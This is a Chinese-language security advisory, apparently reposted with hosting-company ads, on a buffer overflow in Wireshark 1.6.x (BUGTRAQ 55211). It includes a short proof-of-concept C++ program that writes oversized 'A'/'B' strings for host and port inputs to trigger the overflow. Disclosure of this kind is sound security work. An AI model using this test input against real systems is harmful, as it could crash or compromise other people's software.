|
發布日期:2012-08-28
更新日期:2012-08-29
受影響系統:
Wireshark Wireshark 1.6.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55211
-
Wireshark(前稱Ethereal)是一個網絡分組分析軟件�。
Wireshark 1.6.0�、1.8.2及其他版本在實現上存在緩沖區溢出漏洞���,可允許遠程攻擊者在受影響應用中執行任意代碼�。
<*來源:X-h4ck
*>
測試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性����,僅供安全研究與教學之用����。使用者風險自負�����!
X-h4ck ()提供了如下測試方法:
#include <cstdio>
#include <iostream>
// wrote a little shit code to generate > nicely for u those strings
using namespace std;
int main(){
char buff1[] = "\x41";
char buff2[] = "\x42";
FILE *txtfile;
txtfile = fopen("c:\\exploit.txt", "w");
fputs("Host Input:\n",txtfile);
for(int i=0; i < 659; i++){
fputs(buff1,txtfile);
}
fputs("\n",txtfile);
fputs("Port Input:\n",txtfile);
for (int y=0; y < 652; y++) {
fputs(buff1,txtfile);
}
for(int x=0; x < 8; x++) {
fputs(buff2,txtfile);
}
fclose(txtfile);
return 0;
}
建議:
--------------------------------------------------------------------------------
廠商補���。
Wireshark
---------
目前廠商還沒有提供補丁或者升級程序���,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:
本文出自:億恩科技【www.endtimedelusion.com】
服務器租用/服務器托管中國五強���!虛擬主機域名注冊頂級提供商��!15年品質保障���!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯通骨干機房
0371-60135900
